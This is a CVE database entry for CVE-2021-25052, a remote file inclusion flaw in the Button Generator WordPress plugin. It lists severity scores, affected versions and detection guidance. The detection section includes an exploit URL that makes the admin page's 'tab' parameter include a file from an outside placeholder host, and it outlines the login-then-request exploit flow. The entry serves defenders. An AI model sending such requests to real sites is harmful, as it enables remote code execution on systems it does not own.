cbcvebase.
CVE-2021-25052
published 2022-01-10

CVE-2021-25052: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as…

PriorityP354high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
3.53%
87.8th percentile
The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.

Affected

1 ranges
VendorProductVersion rangeFixed in
wow-companybutton_generator< 2.3.32.3.3

Detection & IOCsextracted from sources · hover to see the quote

url/wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/
path/wp-admin/admin.php?page=wow-company&tab=
  • Look for GET requests to /wp-admin/admin.php with query parameters page=wow-company and a tab= parameter containing an external URL (http://, https://) or data:// URI, indicating remote file inclusion attempt.
  • The exploit requires two steps: an authenticated POST to /wp-login.php followed by a GET to /wp-admin/admin.php?page=wow-company&tab=<remote_url>. Correlate login events with subsequent wow-company tab parameter abuse.
  • Flag any HTTP request where the 'tab' query parameter in the wow-company admin page contains data://, http://, or https:// schemes, as these are the supported RFI vectors.
  • ·Exploitation requires the victim to be authenticated (or tricked via CSRF) as an admin-level WordPress user; unauthenticated exploitation is not directly possible without a CSRF vector.
  • ·The vulnerability only affects Button Generator plugin versions before 2.3.3; version 2.3.3 and later are patched.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.05.1MEDIUMAV:N/AC:H/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.